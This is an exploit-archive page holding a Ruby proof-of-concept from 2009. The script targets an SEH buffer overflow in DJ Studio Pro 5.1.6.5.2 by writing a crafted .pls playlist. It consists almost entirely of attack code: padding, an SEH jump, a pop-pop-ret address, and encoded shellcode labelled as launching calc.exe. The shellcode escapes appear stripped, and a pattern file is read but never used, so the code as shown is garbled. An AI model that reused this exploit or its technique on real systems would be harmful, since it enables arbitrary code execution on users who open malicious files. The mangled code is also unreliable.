DJ Studio Pro 5.1.6.5.2 SEH Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Published : 2009-12-30
# Author : Sébastien Duquette
# Previous Title : Quick Player v1.2 Unicode Buffer Overflow Exploit
# Next Title : Mini-stream Ripper v3.0.1.1 .pls Universal BOF (Perl)

#!/usr/bin/ruby
# Exploit Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Date          : 2009-12-30
# Author        : Sébastien Duquette - ekse.0x@gmail.com
# Software Link : http://www.e-soft.co.uk/
# Version       : 5.1.6.5.2
# Tested on     : Windows XP SP2 En
# OSVDB ID      : 58159
# Overflow originally discovered by prodigy

# exec calc.exe
payload = 
"xdaxdcxd9x74x24xf4x5dx55x59x49x49x49x49x49" +
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" +
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" +
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" +
"x75x4ax49x49x6cx48x68x4bx39x45x50x43x30x45" +
"x50x43x50x4dx59x48x65x46x51x4ax72x43x54x4e" +
"x6bx51x42x46x50x4cx4bx50x52x44x4cx4cx4bx51" +
"x42x47x64x4ex6bx44x32x51x38x46x6fx4fx47x42" +
"x6ax45x76x50x31x4bx4fx50x31x4fx30x4ex4cx47" +
"x4cx45x31x51x6cx47x72x44x6cx51x30x4ax61x48" +
"x4fx44x4dx47x71x48x47x49x72x4ax50x43x62x43" +
"x67x4ex6bx51x42x46x70x4cx4bx51x52x45x6cx45" +
"x51x48x50x4cx4bx51x50x44x38x4cx45x4fx30x44" +
"x34x43x7ax46x61x48x50x46x30x4cx4bx47x38x45" +
"x48x4ex6bx51x48x45x70x46x61x48x53x4dx33x47" +
"x4cx47x39x4ex6bx47x44x4cx4bx46x61x4bx66x44" +
"x71x4bx4fx45x61x4bx70x4ex4cx4ax61x4ax6fx46" +
"x6dx45x51x4fx37x44x78x4bx50x44x35x48x74x45" +
"x53x43x4dx4ax58x47x4bx51x6dx47x54x51x65x49" +
"x72x51x48x4cx4bx46x38x51x34x47x71x48x53x51" +
"x76x4cx4bx46x6cx50x4bx4cx4bx43x68x45x4cx43" +
"x31x4ax73x4cx4bx44x44x4cx4bx43x31x4ex30x4d" +
"x59x43x74x45x74x44x64x51x4bx43x6bx51x71x51" +
"x49x42x7ax46x31x49x6fx4bx50x42x78x43x6fx51" +
"x4ax4ex6bx46x72x48x6bx4fx76x51x4dx51x7ax46" +
"x61x4cx4dx4bx35x48x39x47x70x45x50x45x50x42" +
"x70x45x38x46x51x4cx4bx50x6fx4bx37x49x6fx49" +
"x45x4fx4bx48x70x4cx75x4ex42x50x56x51x78x4f" +
"x56x4fx65x4dx6dx4fx6dx49x6fx4bx65x47x4cx44" +
"x46x43x4cx46x6ax4fx70x49x6bx49x70x51x65x47" +
"x75x4dx6bx43x77x45x43x50x72x50x6fx42x4ax47" +
"x70x50x53x4bx4fx48x55x43x53x43x51x50x6cx42" +
"x43x44x6ex43x55x44x38x45x35x45x50x44x4ax41" +
"x41"

pattern = File.open('pattern_5000.txt', 'r').read

f = File.open('boom.pls', 'w')
f.print 'A' * 1308
f.print "xebx06x90x90"
f.print "x2dxc6x4f1"   # pop-pop-ret @ 0x014FC62D [djstudiopro.exe]
f.print payload
f.print 'A' * 10000

f.close